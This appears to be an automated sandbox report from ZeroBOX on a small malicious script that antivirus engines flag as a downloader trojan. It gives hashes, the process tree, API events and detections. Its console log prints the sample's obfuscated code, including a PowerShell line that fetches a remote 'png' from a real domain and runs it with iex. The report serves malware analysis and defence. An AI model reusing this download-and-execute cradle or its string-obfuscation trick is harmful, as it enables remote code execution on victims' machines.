Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 5, 2023, 9:06 a.m.	April 5, 2023, 9:08 a.m.

Size	634.0B
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`87526ee2ef30a987f5b7089ab517adba`
SHA256	`041b5d2324dff261827830e68e4b168eb6590dbd144ab536eb1f56898aa6c552`
CRC32	`AC0374DE`
ssdeep	`12:9vWdCw6RkTTTTTTTTTjk3pLx2VoAmI0opeLbfH/hHRSSFDH+g1kMt5HTC:9ACwNTTTTTTTTTjk5dRAmIDMLbffpRpC`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\one1.txt.ps1
3024
- replace.exe "C:\Windows\system32\replace.exe" "OEFpSleGvJLReEHDyCQdVRRvZddnYLfmOzaoMyfrleGvJnuIOcOyncGzVOkLzVOkL OEFpS w" leGvJ s
  2188
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" LReEH c
  2268
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" DyCQd r
  2360
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" VRRvZ i
  2376
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" ddnYL p
  1648
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" fmOza t
  1604
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" oMyfr .
  1164
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" nuIOc h
  1720
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" OyncG e
  1472
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" zVOkL l
  2128
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced"
  2576

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 56 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: The term 'On' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000023	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: or operable program. Check the spelling of the name, or if a path was included console_handle: 0x0000002f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: , verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\one1.txt.ps1:1 char:3 console_handle: 0x00000047	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + On <<<< Error Resume Next console_handle: 0x00000053	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + CategoryInfo : ObjectNotFound: (On:String) [], CommandNotFoundE console_handle: 0x0000005f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: xception console_handle: 0x0000006b	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'Cr console_handle: 0x00000097	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: eateObject'. console_handle: 0x000000a3	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\one1.txt.ps1:2 char:4 console_handle: 0x000000af	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + Set <<<< SEUSEUJSD = CreateObject(Replace(Replace(Replace(Replace(Replace(Re console_handle: 0x000000bb	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: place(Replace(Replace(Replace(Replace(Replace("OEFpSleGvJLReEHDyCQdVRRvZddnYLfm console_handle: 0x000000c7	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: OzaoMyfrleGvJnuIOcOyncGzVOkLzVOkL", "OEFpS", "w"), "leGvJ", "s"), "LReEH", "c") console_handle: 0x000000d3	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: , "DyCQd", "r"), "VRRvZ", "i"), "ddnYL", "p"), "fmOza", "t"), "oMyfr", "."), "n console_handle: 0x000000df	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: uIOc", "h"), "OyncG", "e"), "zVOkL", "l")) console_handle: 0x000000eb	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x000000f7	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: ndingException console_handle: 0x00000103	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x0000010f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: .Commands.SetVariableCommand console_handle: 0x0000011b	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: The term 'SETGYHESYS' is not recognized as the name of a cmdlet, function, scri console_handle: 0x0000003f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: pt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x0000001f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x00000033	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\one1.txt.ps1:3 char:11 console_handle: 0x0000003f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + SETGYHESYS <<<< = ("POWeRS") console_handle: 0x0000004b	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + CategoryInfo : ObjectNotFound: (SETGYHESYS:String) [], CommandN console_handle: 0x0000005b	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: otFoundException console_handle: 0x00000067	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000073	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: The term 'SEUSEUJSD.Run' is not recognized as the name of a cmdlet, function, s console_handle: 0x00000093	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: cript file, or operable program. Check the spelling of the name, or if a path w console_handle: 0x000000a3	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: as included, verify that the path is correct and try again. console_handle: 0x000000af	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\one1.txt.ps1:4 char:14 console_handle: 0x000000bb	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + SEUSEUJSD.Run <<<< ((SETGYHESYS)+"HeLL.eXe $req = [System.Net.WebRequest]::Cr console_handle: 0x000000c7	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: eate('https://pallarsactiu.cat/note3.png'); $res = $req.GetResponse(); iex ([Sy console_handle: 0x000000d3	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: stem.IO.StreamReader] ($res.GetResponseStream())).ReadToEnd()"), 0 console_handle: 0x000000df	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + CategoryInfo : ObjectNotFound: (SEUSEUJSD.Run:String) [], Comma console_handle: 0x000000eb	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: ndNotFoundException console_handle: 0x000000f7	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000103	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'No console_handle: 0x00000123	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: thing'. console_handle: 0x0000012f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\one1.txt.ps1:5 char:4 console_handle: 0x0000013b	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + Set <<<< ali = Nothing console_handle: 0x00000147	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x00000153	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: ndingException console_handle: 0x0000015f	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x0000016b	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: .Commands.SetVariableCommand console_handle: 0x00000177	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: Invalid switch - s console_handle: 0x00000013	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: Invalid switch - c console_handle: 0x00000013	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: Invalid switch - r console_handle: 0x00000013	1	1
WriteConsoleW April 5, 2023, 9:06 a.m.	buffer: Invalid switch - i console_handle: 0x00000013	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b27f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b27f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b27f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b27f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b27f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b27f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b2eb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 5, 2023, 9:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b2eb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 5, 2023, 9:06 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (16 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06463000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06464000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06465000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 5, 2023, 9:06 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

FireEye	VB:Trojan.Valyria.5229
ALYac	VB:Trojan.Valyria.5229
VIPRE	VB:Trojan.Valyria.5229
Symantec	ISB.Downloader!gen80
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VB:Trojan.Valyria.5229
MicroWorld-eScan	VB:Trojan.Valyria.5229
Emsisoft	VB:Trojan.Valyria.5229 (B)
DrWeb	VBS.DownLoader.2284
MAX	malware (ai score=85)
Arcabit	VB:Trojan.Valyria.D146D
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	VB:Trojan.Valyria.5229
AVG	Script:SNH-gen [Drp]

One or more non-whitelisted processes were created (11 events)

parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" nuIOc h
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" OyncG e
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" LReEH c
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" fmOza t
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" ddnYL p
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" zVOkL l
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" oMyfr .
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced"
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" DyCQd r
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "OEFpSleGvJLReEHDyCQdVRRvZddnYLfmOzaoMyfrleGvJnuIOcOyncGzVOkLzVOkL OEFpS w" leGvJ s
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" VRRvZ i

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\replace.exe

one1.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All